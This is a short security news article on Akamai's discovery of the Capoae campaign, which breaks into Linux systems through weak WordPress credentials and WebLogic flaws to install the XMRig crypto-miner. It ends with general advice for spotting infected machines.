New Malware Campaign Targets Linux and Web Apps to Install Crypto-Mining Software

Bitdefender Where To Buy

Security researchers have identified a new campaign pushing malware that targets Linux devices and specific web applications with the purpose of deploying crypto-mining apps.

Taking over hardware to deploy crypto-mining apps is not uncommon. Criminals try to compromise systems so they can work from them to cut operational costs. Crypto mining is an expensive endeavor, and using other people’s systems reduces almost all costs.

Criminals tend to follow a similar path, and it starts by identifying poorly protected devices and services, usually with default or weak credentials. Bitdefender identified a similar campaign a few months ago, with attackers deploying Monero mining malware via weak SSH credentials.

The campaign Akamai security researchers discovered is more complex, as criminals tried a lot harder to obfuscate their activity on compromised systems. Like Bitdefender, Akamai used specially designed honeypots to track the malware’s behavior once it entered the system.

The attackers deployed a PHP malware, which the researchers named Capoae. The systems are likely compromised via an infected WordPress plugin named ‘download-monitor.”

“Download-monitor had been installed after the honeypot’s weak WordPress admin credentials had been guessed,” said the Akamai researchers. “A 3MB UPX packed Golang binary was also downloaded to /tmp. Upon examination, it was clear the malware had some decryption functionality and an encrypted file stored in another directory.”

The goal is to deploy a Golang binary that eventually uses a number of known Oracle Weblogic to infect systems with weak credentials and deploy XMRig, a crypto-mining software. Of course, it also employs numerous obfuscation tactics in an attempt to stay under the radar.

“Keeping an eye out for higher than normal system resource consumption, odd/unexpected running processes, suspicious artifacts (files, crontab entries, SSH keys, etc.), and suspicious access log entries, etc., will help you potentially identify compromised machines” the researchers also said. A full list of indicators of compromise is also available.